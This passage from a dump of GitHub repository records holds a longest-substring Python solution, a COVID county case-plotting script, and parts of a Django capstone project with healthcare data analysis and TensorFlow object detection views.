SL.addteacher(\"李睿\", '数学', '未知机构', '职务数学老师')"
}
] | 3 |
AndreasPr/Python-Longest-Substring-Without-Repeating-Chars | https://github.com/AndreasPr/Python-Longest-Substring-Without-Repeating-Chars | a2f94e287adbba44979091e7258d824868865823 | 72945530826acafacbe82607432c36029db5724a | de25cfee581b0c56026d44b0ee4eeeab5693adaa | refs/heads/master | 2023-04-11T20:02:39.436353 | 2021-05-02T12:26:02 | 2021-05-02T12:26:02 | 310,864,791 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6284953355789185,
"alphanum_fraction": 0.6311584711074829,
"avg_line_length": 27.884614944458008,
"blob_id": "c9455764f5144f429eaec56fefa6d570753bcca1",
"content_id": "88ad793d4d75cd55f135fc6b8fac89959569d4c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 751,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/index.py",
"repo_name": "AndreasPr/Python-Longest-Substring-Without-Repeating-Chars",
"src_encoding": "UTF-8",
"text": "def lengthOfLongestSubstring(s):\n lengthOfSubstring = len(s)\n result = 0\n for i in range(0, lengthOfSubstring):\n for j in range(i, lengthOfSubstring):\n if(isUnique(s, i, j)):\n result = max(result, j - i)\n\n return result\n\ndef isUnique(s, start, end):\n setOfStrings = set()\n for i in range(start, end):\n character = s[i]\n if(character in setOfStrings):\n return False\n setOfStrings.add(character)\n\n return True\n\nif __name__ == '__main__':\n stringInput = \"pwwkew\"\n print(f\"Input value: {stringInput}\")\n\n answerForLength = lengthOfLongestSubstring(stringInput)\n print(f\"The length of the longest substring without repeating characters is {answerForLength}\")\n"
},
{
"alpha_fraction": 0.8533333539962769,
"alphanum_fraction": 0.8533333539962769,
"avg_line_length": 24,
"blob_id": "767bb3231cbb321aba92baf53b3c79589df8b1ae",
"content_id": "df022270cc99ee413e52ce32222318879dd108a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AndreasPr/Python-Longest-Substring-Without-Repeating-Chars",
"src_encoding": "UTF-8",
"text": "# Longest Substring Without Repeating Characters\n\nImplementation in Python\n"
}
] | 2 |
acoastalfog/covid-county-plotter | https://github.com/acoastalfog/covid-county-plotter | 327c5a6155d178b889fd656daa3a82f2bd100c32 | 3868a42e1852bac790ab1cec1af62b03b256bfec | 14cd3181fd80adfade5520443dfa91148f87680f | refs/heads/master | 2023-07-17T23:12:10.468850 | 2021-09-06T02:10:18 | 2021-09-06T02:10:18 | 258,795,685 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7612903118133545,
"alphanum_fraction": 0.7623655796051025,
"avg_line_length": 41.272727966308594,
"blob_id": "6867baa190f3a3b982f91382d3f8a5ffde85ddd7",
"content_id": "e266578e5909d44133d4572115e7236b33caec74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 253,
"num_lines": 22,
"path": "/README.md",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "# COVID County Plotter\n\nI was frustrated that simple visual time series plots of county-level COVID data seemed to be hard to come by, so I wrote a simple, poorly-engineered, quick and dirty script to plot what I wanted to see. It only has one feature and only makes one chart.\n\nIt's pretty easy to use.\n\n```python\nimport county_plotter as cp\n\nwestchester = cp.countyDataPlotter (\"Westchester\", \"New York\", \"JHU\")\nwestchester.plotCasesAndDeathsTwoPanes (7)\n```\n\nTakes county and state, and then you can select between the JHU or NYT live github data. JHU tends to be ahead. Parameter passed to the plotting function is the moving window size. And it just writes to a fixed format ```images``` folder.\n\nIt's all very hacky.\n\nIf you want to add a new plot or feature, please feel free to throw me a PR.\n\nHere's an example of the only thing it does for my home county of Rockland. Doing pretty well!\n\n\n"
},
{
"alpha_fraction": 0.6018962860107422,
"alphanum_fraction": 0.6185164451599121,
"avg_line_length": 42.096153259277344,
"blob_id": "366e67b35e4edab81c740ad0bbe4292496a36b11",
"content_id": "bf63220c5eeeb52d5f8a5d8d3f8d91cdbb50db72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8965,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 208,
"path": "/county_plotter.py",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env/python\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\n\nfrom mpl_toolkits.axes_grid.inset_locator import (inset_axes, InsetPosition, mark_inset)\n\nclass countyDataPlotter:\n def __init__ (self, county, state, dataType, insertType = None):\n\n # County, state, and data type are static per instantiation\n self.county = county\n self.state = state\n self.dataType = dataType\n self.insertType = insertType\n\n # Data type readers just grab lists of dates, cases, and deaths. Preprocessing in __init__\n if self.dataType == \"NYT\":\n readFunction = self.readNYTData\n elif self.dataType == \"JHU\":\n readFunction = self.readJHUData\n else:\n print (\"Unknown data type, options are 'NYT' or 'JHU'.\")\n sys.exit ()\n\n # Should assert\n if self.insertType:\n if self.insertType == \"right\" or self.insertType == \"left\":\n pass\n else:\n print (\"Unknown insert type, options are 'right' or 'left'.\")\n sys.exit ()\n \n # Read data\n self.dates, self.cumulativeCases, self.cumulativeDeaths = readFunction ()\n\n # Compute date limits (future: adjustable) \n self.dateLims = [self.dates[0], self.dates[-1]]\n \n # Compute daily cases from cumulatives\n self.dailyCases = [self.cumulativeCases[0]]\n self.dailyDeaths = [self.cumulativeDeaths[0]]\n for i in range(1, len(self.cumulativeCases)):\n self.dailyCases.append(self.cumulativeCases[i] - self.cumulativeCases[i - 1])\n self.dailyDeaths.append(self.cumulativeDeaths[i] - self.cumulativeDeaths[i - 1])\n\n def readNYTData (self):\n usCounties = pd.read_csv(\"https://github.com/nytimes/covid-19-data/raw/master/us-counties.csv\")\n countyData = usCounties[(usCounties.state == self.state) & \\\n (usCounties.county == self.county)].reset_index()\n\n dates = countyData['date'].tolist()\n dates = [dt.datetime.strptime(date, '%Y-%m-%d').date() for date in dates]\n\n cumulativeCases = countyData['cases'].tolist()\n cumulativeDeaths = countyData['deaths'].tolist()\n\n return dates, cumulativeCases, cumulativeDeaths\n\n def readJHUData (self):\n usCases = pd.read_csv(\"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\")\n usDeaths = pd.read_csv(\"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\") \n\n countyCases = usCases[(usCases.Province_State == self.state) & \\\n (usCases.Admin2 == self.county)].reset_index()\n countyDeaths = usDeaths[(usDeaths.Province_State == self.state) & \\\n (usDeaths.Admin2 == self.county)].reset_index()\n\n # Return cumulative case list, find first non-zero index\n # Deaths from JHU have one extra field, so offset the cumulative data in place\n nonZeroIndex = np.nonzero(countyCases.values.tolist()[0][12:])[0][0] + 12\n cumulativeCases = countyCases.values.tolist()[0][nonZeroIndex:]\n cumulativeDeaths = countyDeaths.values.tolist()[0][nonZeroIndex + 1:]\n\n dates = list(countyCases)[nonZeroIndex:]\n dates = [dt.datetime.strptime(date, '%m/%d/%y').date() for date in dates]\n\n return dates, cumulativeCases, cumulativeDeaths\n\n def convolutionMovingAverage (self, data, window):\n weights = np.repeat(1.0, window) / window\n dataExtension = np.hstack([[0] * (window - 1), data])\n\n # This is a bit of a hack. 
Just screw around with the convolution window to fit depending on the window size.\n\n dataMovingAverage = \\\n np.convolve(dataExtension, weights)[window + (window - 8): -(window - (window - 6))]\n\n return dataMovingAverage \n\n def setTwoPaneFormatPerPane (self, ax, axDaily):\n # Will use these to smooth out the x data for any called county\n locator = mdates.AutoDateLocator(maxticks = 10)\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Ensure cumulative curve sits on top of secondary cutve\n ax.set_zorder(10)\n ax.patch.set_visible(False)\n\n ax.set_ylim(bottom=0)\n\n ax.tick_params(labelsize=8)\n\n # Apply formatting after second axis\n axDaily.xaxis.set_major_locator(locator)\n axDaily.xaxis.set_major_formatter(formatter)\n \n # Only need to set the xlim on the second axis\n axDaily.set_xlim(self.dateLims)\n \n # NYTimes data is sometimes a little ridiculous\n axDaily.set_ylim(bottom=0)\n\n axDaily.tick_params(labelsize=8)\n \n def plotCasesAndDeathsTwoPanes (self, window):\n # Compute the moving average but just don't just truncate\n dailyCasesMovingAverage = self.convolutionMovingAverage(self.dailyCases, window)\n dailyDeathsMovingAverage = self.convolutionMovingAverage(self.dailyDeaths, window)\n\n # Start figure\n fig, ax = plt.subplots(2, 1, constrained_layout = True, figsize = (5, 6), dpi=300)\n ax[0].plot(self.dates, self.cumulativeCases, '-', c='blue', lw=1.5)\n ax[0].plot(self.dates, self.cumulativeCases, '.', c='blue', lw=1.5)\n\n ax[0].set_title(self.county + \", \" + self.state + \" Cumulative Cases and Cases/Day\", fontsize = 8)\n ax[0].set_ylabel(\"Cumulative Cases\", fontsize = 8)\n \n axDaily0 = ax[0].twinx()\n axDaily0.bar(self.dates, self.dailyCases, color='orange', align='edge')\n axDaily0.plot(self.dates, dailyCasesMovingAverage, c='grey')\n\n axDaily0.set_ylabel(\"Daily Cases\", fontsize=8)\n\n # Custom legend\n convolutionLabel = str(window) + \" Day Convolution\"\n legendElements = [matplotlib.lines.Line2D([0], [0], color='b', marker='.', lw=1.5, label='Cumulative Cases'), \\\n matplotlib.lines.Line2D([0], [0], color='grey', lw=1.5, label=convolutionLabel)]\n ax[0].legend(handles=legendElements, loc=2, fontsize=8)\n\n # Common pane format options\n self.setTwoPaneFormatPerPane(ax[0], axDaily0)\n\n if self.insertType:\n # Optional inset with log daily data\n axInset = plt.axes([0, 0, 1, 1])\n\n if self.insertType == 'right':\n ip = InsetPosition(ax[0], [0.40, 0.25, 0.4, 0.4])\n elif self.insertType == 'left':\n print (\"'left' is not actually supported\")\n sys.exit()\n axInset.set_axes_locator(ip)\n\n axInset.bar(self.dates[-30:], self.dailyCases[-30:], color='orange', align='edge')\n axInset.plot(self.dates[-30:], dailyCasesMovingAverage[-30:], c='grey')\n\n # Will use these to smooth out the x data for any called county\n locator = mdates.AutoDateLocator(maxticks = 6)\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Apply formatting after second axis\n axInset.xaxis.set_major_locator(locator)\n axInset.xaxis.set_major_formatter(formatter)\n \n # Only need to set the xlim on the second axis\n newDateLims = [self.dates[-30], self.dates[-1]]\n axInset.set_xlim(newDateLims)\n \n # NYTimes data is sometimes a little ridiculous\n axInset.set_ylim(bottom=0)\n\n axInset.tick_params(labelsize=8)\n\n # Ax[1] is deaths\n ax[1].plot(self.dates, self.cumulativeDeaths, '-', c='blue', lw=1.5)\n ax[1].plot(self.dates, self.cumulativeDeaths, '.', c='blue', lw=1.5)\n\n ax[1].set_title(self.county + \", \" + self.state + \" Cumulative Deaths and Deaths/Day\", 
fontsize=8)\n ax[1].set_ylabel(\"Cumulative Deaths\", fontsize=8)\n \n axDaily1 = ax[1].twinx()\n axDaily1.bar(self.dates, self.dailyDeaths, color='orange', align='edge')\n axDaily1.plot(self.dates, dailyDeathsMovingAverage, c='grey')\n\n axDaily1.set_ylabel(\"Daily Deaths\", fontsize=8)\n \n # Custom legend\n convolutionLabel = str(window) + \" Day Convolution\"\n legendElements = [matplotlib.lines.Line2D([0], [0], color='b', marker='.', lw=1.5, label='Cumulative Deaths'), matplotlib.lines.Line2D([0], [0], color='grey', lw=1.5, label=convolutionLabel)]\n ax[1].legend(handles=legendElements, fontsize=8)\n\n # Common pane format options\n self.setTwoPaneFormatPerPane(ax[1], axDaily1)\n\n \n # Save a figure\n if not os.path.exists('images'):\n os.makedirs('images')\n\n nameOfFigure = 'images/' + self.county + \"-\" + self.state + \"-\" + self.dataType + \".png\"\n plt.savefig(nameOfFigure)\n\n"
},
{
"alpha_fraction": 0.7486772537231445,
"alphanum_fraction": 0.7574955821037292,
"avg_line_length": 33.3636360168457,
"blob_id": "0387e19e6de57ad429435248ea5918181582b800",
"content_id": "c14cc2db187dade5d2175f2971139542a71c671c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/county_caller.py",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env\n\nimport county_plotter as cp\n\nrocklandJHU = cp.countyDataPlotter (\"Rockland\", \"New York\", \"JHU\")\nrocklandJHU.plotCasesAndDeathsTwoPanes (7)\n\nhenricoJHU = cp.countyDataPlotter (\"Henrico\", \"Virginia\", \"JHU\")\nhenricoJHU.plotCasesAndDeathsTwoPanes (7)\n\nknoxJHU = cp.countyDataPlotter (\"Knox\", \"Tennessee\", \"JHU\")\nknoxJHU.plotCasesAndDeathsTwoPanes (7)\n\n#washingtonJHU = cp.countyDataPlotter (\"Washington\", \"Oregon\", \"JHU\")\n#washingtonJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#lickingJHU = cp.countyDataPlotter (\"Licking\", \"Ohio\", \"JHU\")\n#lickingJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#dupageJHU = cp.countyDataPlotter (\"DuPage\", \"Illinois\", \"JHU\")\n#dupageJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#cookJHU = cp.countyDataPlotter (\"Cook\", \"Illinois\", \"JHU\")\n#cookJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#deschutesJHU = cp.countyDataPlotter (\"Deschutes\", \"Oregon\", \"JHU\")\n#deschutesJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#delawareJHU = cp.countyDataPlotter (\"Delaware\", \"New York\", \"JHU\")\n#delawareJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#otsegoJHU = cp.countyDataPlotter (\"Otsego\", \"New York\", \"JHU\")\n#otsegoJHU.plotCasesAndDeathsTwoPanes (7)\n"
}
] | 3 |
Siddhant111/Capstone-Django | https://github.com/Siddhant111/Capstone-Django | 8f671f72c2dedcf84661b2031c28a01d8f5e5078 | 08297910b056510e612d0af8c9adfdbba29dd1d4 | 46b8e90e70f35a0230c23d9fe6276b7b59e227d2 | refs/heads/master | 2022-12-15T13:15:59.412610 | 2019-11-14T19:45:38 | 2019-11-14T19:45:38 | 220,622,954 | 0 | 2 | null | 2019-11-09T09:56:54 | 2019-11-14T19:46:13 | 2021-03-31T21:33:06 | Python | [
{
"alpha_fraction": 0.7281106114387512,
"alphanum_fraction": 0.7281106114387512,
"avg_line_length": 32.38461685180664,
"blob_id": "a845ab6c22c3e33bd8c1b817247b10b23e6c7030",
"content_id": "0c28ff31ed173a7b5063f7658faea20baa54367d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 13,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/diagnostic/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nimport os\n\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n\n# Create your views here.\n\ndef diagnostic(request):\n if request.method == 'POST':\n file_path = os.path.join(settings.BASE_DIR, 'models\\\\research\\\\object_detection')\n os.system('python ' + file_path + '\\\\object_detection_tutorial.py')\n return render(request, 'diagnostic.html')\n"
},
{
"alpha_fraction": 0.5468212962150574,
"alphanum_fraction": 0.5528350472450256,
"avg_line_length": 47,
"blob_id": "fc00bd02fe68cb1e3ff40b6e708dce1f0877ee51",
"content_id": "60a5901d763814d2b5d21d434bdd2ff7ba0cf0a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 4656,
"license_type": "no_license",
"max_line_length": 228,
"num_lines": 97,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/preventative/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n# Create your views here.\ndef preventative(request):\n try:\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n\n dataset = pd.read_excel(settings.BASE_DIR + uploaded_file_url)\n dataset = dataset.drop([0])\n dataset = dataset.drop([1])\n dataset = dataset.drop([95])\n dataset = dataset.rename(columns={\n 'Type': 'Row Labels',\n 'TRUE': 'Count of Doctors',\n 'Unnamed: 2': 'Centers',\n 'Unnamed: 3': 'Population',\n 'Unnamed: 4': 'Areas',\n 'Unnamed: 5': 'Zones',\n })\n imputer = Imputer(missing_values = 'nan', strategy = 'mean', axis = 0)\n dataset = dataset.dropna(how='any')\n\n maximum_doc = dataset['Count of Doctors'].groupby(dataset['Zones']).sum().max()\n max_dict = dict(dataset['Count of Doctors'].groupby(dataset['Zones']).sum())\n max_zone = list(max_dict.keys())[list(max_dict.values()).index(maximum_doc)]\n plt.scatter(dataset['Count of Doctors'], dataset['Zones'])\n plt.suptitle('Count of Doctors vs Zones')\n plt.xlabel('Count of Doctors')\n plt.ylabel('Zones')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_1.png', bbox_inches = 'tight')\n plt.clf()\n\n sheets = pd.read_excel(settings.BASE_DIR + uploaded_file_url, sheet_name=['sum'])\n dataset = pd.concat(sheets[frame] for frame in sheets.keys())\n dataset = dataset.drop([2])\n dataset = dataset.rename(columns={\n 'Unnamed: 0': 'Row Labels',\n 'Unnamed: 1': 'Area',\n 'Unnamed: 2': 'Count of center',\n 'Unnamed: 3': 'doctors',\n 'Unnamed: 4': 'pop',\n 'Unnamed: 5': 'Pop/center',\n 'Unnamed: 6': 'Pop/Dr',\n 'Unnamed: 7': 'Dr/cr',\n })\n imputer = Imputer(missing_values = 'nan', strategy = 'mean', axis = 0)\n dataset = dataset.dropna(how='any')\n\n plt.scatter(dataset['Count of center'], dataset['Area'])\n plt.suptitle('Count of center vs Area')\n plt.xlabel('Count of center')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_2.png', bbox_inches = 'tight')\n plt.clf()\n\n plt.scatter(dataset['doctors'], dataset['Area'])\n plt.suptitle('doctors vs Area')\n plt.xlabel('doctors')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_3.png', bbox_inches = 'tight')\n plt.clf()\n\n plt.scatter(dataset['Pop/center'], dataset['Area'])\n plt.suptitle('Pop/center vs Area')\n plt.xlabel('Pop/center')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_4.png', bbox_inches = 'tight')\n plt.clf()\n\n minimum_pop = dataset['Pop/Dr'].groupby(dataset['Area']).sum().min()\n min_dict = dict(dataset['Pop/Dr'].groupby(dataset['Area']).sum())\n areas_list = []\n for i in min_dict:\n if min_dict[i] > 5000:\n areas_list.append(list(min_dict.keys())[list(min_dict.values()).index(min_dict[i])])\n min_area = list(min_dict.keys())[list(min_dict.values()).index(minimum_pop)]\n plt.scatter(dataset['Pop/Dr'], dataset['Area'])\n plt.suptitle('Pop/Dr vs Area')\n plt.xlabel('Pop/Dr')\n plt.ylabel('Area')\n plt.savefig(settings.BASE_DIR + '/static/' + uploaded_file_url + '_5.png', bbox_inches = 'tight')\n plt.clf()\n\n return render(request, 'preventative.html', 
{'uploaded_file_url': uploaded_file_url, 'maximum_doc': maximum_doc, 'max_zone': max_zone, 'minimum_pop': int(minimum_pop), 'areas_list': areas_list, 'min_area': min_area})\n return render(request, 'preventative.html')\n except:\n return render(request, 'preventative.html', {'error': 'Please Select A File'})\n"
},
{
"alpha_fraction": 0.6967741847038269,
"alphanum_fraction": 0.6967741847038269,
"avg_line_length": 18.5,
"blob_id": "ce6822361bd8b45289943151171f5ed2610716a6",
"content_id": "53f66345b93765d8d7ada55e42ef2e96223d078d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/target/dist/capstone-django-1.0.dev0/capstone/insurance/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'insurance'\n\nurlpatterns = [\n url('insurance/', views.insurance, name = 'insurance'),\n]"
},
{
"alpha_fraction": 0.71856290102005,
"alphanum_fraction": 0.71856290102005,
"avg_line_length": 20,
"blob_id": "3a2b536089effc560aef510b63151b30a3474406",
"content_id": "25f9b5f817a85283ab4b0c063d24cf1e6ec6e852",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 8,
"path": "/src/main/python/capstone/preventative/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'preventative'\n\nurlpatterns = [\n url('preventative/', views.preventative, name = 'preventative'),\n]"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18.799999237060547,
"blob_id": "037910a5dafed04b602ffea76cbb3b0c34de37a2",
"content_id": "491ce91ae7c99c078aeb7266cad1804dcbd59d10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 5,
"path": "/src/main/python/capstone/preventative/apps.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass PreventativeConfig(AppConfig):\n name = 'preventative'\n"
},
{
"alpha_fraction": 0.7084210515022278,
"alphanum_fraction": 0.7189473509788513,
"avg_line_length": 37,
"blob_id": "5f944bc23c1e360f8b72a08b6ab438b7d43912e8",
"content_id": "7d6ad0cefd318d92da9edd67012427bff806af40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 25,
"path": "/src/main/python/capstone/preventative/tests.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom .models import Document\n\n# Create your tests here.\n\nclass DocumentModelTests(TestCase):\n\n def test_was_published_recently_with_future_document(self):\n time = timezone.now() + datetime.timedelta(days=30)\n future_document = Document(uploaded_at=time)\n self.assertIs(future_document.was_published_recently(), False)\n\n def test_was_published_recently_with_old_document(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_document = Document(uploaded_at=time)\n self.assertIs(old_document.was_published_recently(), False)\n\n def test_was_published_recently_with_recent_document(self):\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_document = Document(uploaded_at=time)\n self.assertIs(recent_document.was_published_recently(), True)\n"
},
{
"alpha_fraction": 0.6864035129547119,
"alphanum_fraction": 0.6885964870452881,
"avg_line_length": 29.399999618530273,
"blob_id": "1a45b6bded7e524d430e22822d1ae466553a11df",
"content_id": "f71213d7c397377762afa305120685a8afe67990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 456,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 15,
"path": "/src/main/python/capstone/preventative/models.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Document(models.Model):\n document = models.FileField(upload_to='documents/%Y/%m/%d/')\n uploaded_at = models.DateTimeField(auto_now_add=True)\n def __str__(self):\n return self.document\n def was_published_recently(self):\n now = timezone.now()\n return now - datetime.timedelta(days=1) <= self.uploaded_at <= now\n"
},
{
"alpha_fraction": 0.6888552904129028,
"alphanum_fraction": 0.7017145752906799,
"avg_line_length": 34.41964340209961,
"blob_id": "c0b6817567c50a690159f8af8c86068a5ee2237f",
"content_id": "1a8bab7ba9b2855c687e23321f03676798764351",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3966,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 112,
"path": "/src/main/python/capstone/models/research/object_detection/object_detection_tutorial.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "import os\nimport pathlib\nimport numpy as np\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport cv2\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom IPython.display import display\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\n\ncap = cv2.VideoCapture(0)\n\nif \"models\" in pathlib.Path.cwd().parts:\n while \"models\" in pathlib.Path.cwd().parts:\n os.chdir('..')\n\nutils_ops.tf = tf.compat.v1\ntf.gfile = tf.io.gfile\n\ndef load_model(model_name):\n base_url = 'http://download.tensorflow.org/models/object_detection/'\n model_file = model_name + '.tar.gz'\n model_dir = tf.keras.utils.get_file(\n fname=model_name,\n origin=base_url + model_file,\n untar=True\n )\n model_dir = pathlib.Path(model_dir)/\"saved_model\"\n model = tf.saved_model.load(str(model_dir))\n model = model.signatures['serving_default']\n return model\n\nPATH_TO_LABELS = 'models/research/object_detection/data/mscoco_label_map.pbtxt'\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\nPATH_TO_TEST_IMAGES_DIR = pathlib.Path('models/research/object_detection/test_images')\nTEST_IMAGE_PATHS = sorted(list(PATH_TO_TEST_IMAGES_DIR.glob(\"*.jpg\")))\nTEST_IMAGE_PATHS\n\nmodel_name = 'ssd_mobilenet_v1_coco_2017_11_17'\ndetection_model = load_model(model_name)\nprint(detection_model.inputs)\ndetection_model.output_dtypes\ndetection_model.output_shapes\n\ndef run_inference_for_single_image(model, image):\n image = np.asarray(image)\n input_tensor = tf.convert_to_tensor(image)\n input_tensor = input_tensor[tf.newaxis,...]\n output_dict = model(input_tensor)\n num_detections = int(output_dict.pop('num_detections'))\n output_dict = {key:value[0, :num_detections].numpy() for key,value in output_dict.items()}\n output_dict['num_detections'] = num_detections\n output_dict['detection_classes'] = output_dict['detection_classes'].astype(np.int64)\n if 'detection_masks' in output_dict:\n detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n output_dict['detection_masks'], output_dict['detection_boxes'],\n image.shape[0], image.shape[1]\n )\n detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5, tf.uint8)\n output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()\n return output_dict\n\ndef show_inference(model, image_path):\n # image_np = np.array(Image.open(image_path))\n image_np = np.array(image_path)\n output_dict = run_inference_for_single_image(model, image_np)\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n category_index,\n instance_masks=output_dict.get('detection_masks_reframed', None),\n use_normalized_coordinates=True,\n line_thickness=8\n )\n # display(Image.fromarray(image_np))\n cv2.imshow('image', image_np)\n\n# for image_path in TEST_IMAGE_PATHS:\n# show_inference(detection_model, image_path)\n\nwhile True:\n ret, image_path = cap.read()\n show_inference(detection_model, image_path)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n sys.exit()\n\nmodel_name = \"mask_rcnn_inception_resnet_v2_atrous_coco_2018_01_28\"\nmasking_model = 
load_model(\"mask_rcnn_inception_resnet_v2_atrous_coco_2018_01_28\")\nmasking_model.output_shapes\n\n# for image_path in TEST_IMAGE_PATHS:\n# show_inference(masking_model, image_path)\n\nwhile True:\n ret, image_path = cap.read()\n show_inference(masking_model, image_path)\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n sys.exit()"
},
{
"alpha_fraction": 0.704402506351471,
"alphanum_fraction": 0.704402506351471,
"avg_line_length": 19,
"blob_id": "5a5e815d4c570c2ba72ec45ce6c7baea69e4a2ae",
"content_id": "0d299c3a39b476c7a74c1b128bb85b1183bd4a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 159,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 8,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/diagnostic/urls.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom . import views\n\napp_name = 'diagnostic'\n\nurlpatterns = [\n url('diagnostic/', views.diagnostic, name = 'diagnostic'),\n]"
},
{
"alpha_fraction": 0.7593985199928284,
"alphanum_fraction": 0.7593985199928284,
"avg_line_length": 21.16666603088379,
"blob_id": "cf814b09724c4e61e9f195cf053a86dc0388add4",
"content_id": "c70874888f12201b258ec7e21a7e0038e4ac1ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
